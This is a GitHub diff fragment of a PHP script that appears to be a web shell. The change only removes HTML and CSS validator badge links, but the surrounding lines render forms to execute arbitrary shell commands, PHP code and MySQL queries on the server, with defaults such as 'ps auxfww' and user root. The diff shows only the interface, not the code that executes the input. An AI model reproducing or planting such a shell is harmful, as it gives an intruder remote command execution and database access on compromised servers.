File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change @@ -69,10 +69,7 @@ function ex($command) {
6969 echo "<form action= \"" . $ phpself . "\" method= \"GET \"><b>Execute a shell command</b><br><input type= \"text \" name= \"cmd \" value= \"ps auxfww \"><input type= \"submit \" value= \"go \"></form><br> " ;
7070 echo "<form action= \"" . $ phpself . "\" method= \"GET \"><b>Execute a PHP command</b><br><input type= \"text \" name= \"phpcode \" value= \"ini_get_all() \"><input type= \"submit \" value= \"go \"></form><br> " ;
7171 echo "<form action= \"" . $ phpself . "\" method= \"GET \"><b>Execute a MySQL query</b><br>host: <input type= \"text \" name= \"host \" value= \"localhost \"><br>user: <input type= \"text \" name= \"user \" value= \"root \"><br>password: <input type= \"password \" name= \"password \"><br>query: <input type= \"text \" name= \"query \"><br><input type= \"submit \" value= \"execute \"></form><br> " ;
72- echo "<div style= \"text-align: center \"> " ;
73- echo "<a href= \"http://validator.w3.org/check/referer \"><img src= \"http://www.w3.org/Icons/valid-html401 \" border= \"0 \" alt= \"Valid HTML 4.01! \"></a> " ;
74- echo "<a href= \"http://jigsaw.w3.org/css-validator/validator?text= " . $ cssEncoded . "\"><img src= \"http://jigsaw.w3.org/css-validator/images/vcss \" border= \"0 \" alt= \"Valid CSS! \"></a> " ;
75- echo "</div></div><div id= \"rightbody \"> " ;
72+ echo "</div><div id= \"rightbody \"> " ;
7673}
7774
7875if (isset ($ _REQUEST ["sysinfo " ])) {
You can’t perform that action at this time.
0 commit comments